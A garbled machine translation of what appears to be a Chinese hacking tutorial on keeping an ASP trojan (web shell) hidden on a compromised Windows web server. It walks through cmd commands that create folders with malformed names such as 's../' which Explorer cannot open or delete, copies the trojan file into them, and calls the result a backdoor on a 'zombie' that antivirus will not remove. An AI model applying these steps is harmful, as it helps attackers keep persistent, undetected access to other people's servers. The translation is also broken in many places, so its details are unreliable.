How can I prevent ASP trojans from being killed?

You need to modify the code or encryption in ASP Trojans to avoid virus infection. If this happens, you do not need to modify it. No one will guarantee that your modified ASP will not be killed by XX antivirus software.

Anyway, I am also lazy, huh, we run cmd, CD C:/winnt/system32/myhome. That is, the address of your virtual directory redirection. Let's talk about the principle first. Everybody

All know that in windows, the "/" symbol is the path separator. For example, "C:/Windows/" means Windows files in partition C.

Folder, "C:/Windows/system.exe" refers to the system.exe file in the Windows folder in the C partition. Let's continue with the assumption:

What if the file name contains the "/" symbol? Assume that "s/" is the name of a folder. The folder is located at: "F:/" and its path is "F:/S /".

When accessing the figure, Windows will mistakenly think that the file we want to open is the S folder of partition F, so that Windows will not be able to open it and an error will be returned, because the above path

Path does not exist.

Maybe you are creating a "s/" file, but windows will prompt you that the "/" symbol cannot be the name of the file or folder. It seems that Windows has long been thinking

At this point. OK. Do not believe that you cannot create a file containing the "/" symbol.

Now open your computer and we have to make some interesting attempts. After entering windows, click Start> Run, enter "cmd", and get the car. (if it is Win98, enter

Enter "command"), then you will see the Windows command console, we just want to use it to complete our remaining tests, the following contains many characters in the Command {} is

My notes:
Microsoft Windows XP [version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:/winnt/system32/myhome> mkdir S/{our first attempt. As a result, only the S folder created in Windows "/" is ignored}

C:/winnt/system32/myhome> mkdir S/S1/{still failed. In Windows, the S folder is created first, and then the S1 folder is created in S}

C:/winnt/system32/myhome> mkdir S./{"S./" Resolved to S "./" ignored again}

The subdirectory or file S./already exists.

C:/winnt/system32/myhome> mkdir s ../{finally succeeded. Now you can see "S." In resource manager but cannot open/delete}

C:/winnt/system32/myhome> mkdir s.../{succeeded again. Can it be blown in the resource browser? S .. "can be opened but cannot be deleted}
 

Why? The "S." folder you see can neither be opened nor deleted, but cannot be opened because of its actual path.

Is "C:/winnt/system32/myhome/s .. /"(we can determine the actual path of the created file) but the name in Windows Resource Manager is changed to" s. "Also

That is to say, when you try to open it, Windows actually tries to open "C:/winnt/system32/myhome/S./", of course, it cannot be opened, and the file does not exist.

In Windows, an error is reported. It cannot be deleted because of this. In windows, a file path that actually exists is incorrectly parsed as a non-existent path, and XX operations are not performed.

.

The file "s .." can be opened but cannot be deleted. Wait... open? You thought windows really opened the "S.../" we created .../"

File? You will understand the experiment below. Or the old rule {} is my comment for your understanding:
----------------------------------------------

Microsoft Windows XP [version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:/winnt/system32/myhome> copy net. asp s ../{copy your asp wood

Trojan file to "s ../", resource manager's "S ."}

1 file has been copied.

C:/winnt/system32/myhome>
 

Now go back to your resource manager and open the "S." folder. What do you see? How can I find the "net. asp" file here? We did just copy it to "S? Me?

They opened the "S." folder, which actually opened "S "? That's true. In fact, if you create another "S" folder, "S." can be opened, but it can be opened.

Is "S ".

This is a key topic. In fact, we will use the S. Directory to hide our Trojan, regardless of whether the trojan is virus, but generally the EXE file cannot be in S.

But ASP Trojans are acceptable! You can run the CMD command through browsing, copy net. asp to the S. directory, and delete net. asp.

Http: // 127.0.0.1/kiss/s ../net. asp. You can see that ASP Trojans have been browsed. Generally, users cannot find them, even if they are professional antivirus software.

Only kill "S" and skip "s ../", so let's talk about the deletion method.
Microsoft Windows XP [version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

F:/test> dir

The volume in drive F is bgting

The serial number of the volume is 2c8e-fe1c.

F:/test directory

<Dir>.

<Dir> ..

<Dir> S.

<Dir> S ..

9 bytes for one file

3,390,029,824 bytes available for five Directories

C:/winnt/system32/myhome> rmdir s ../

The directory is not empty.

C:/winnt/system32/myhome> rmdir s .. // s

S ../, are you sure you want to confirm (y/n )? Y

C:/winnt/system32/myhome> rmdir s... // s

S.../, are you sure you want to confirm (y/n )? Y
 

You don't have to worry about cracking your zombie. Well, such a hidden backdoor will be built and won't be killed. If you are a zombie, the above will be tested and passed in 3389.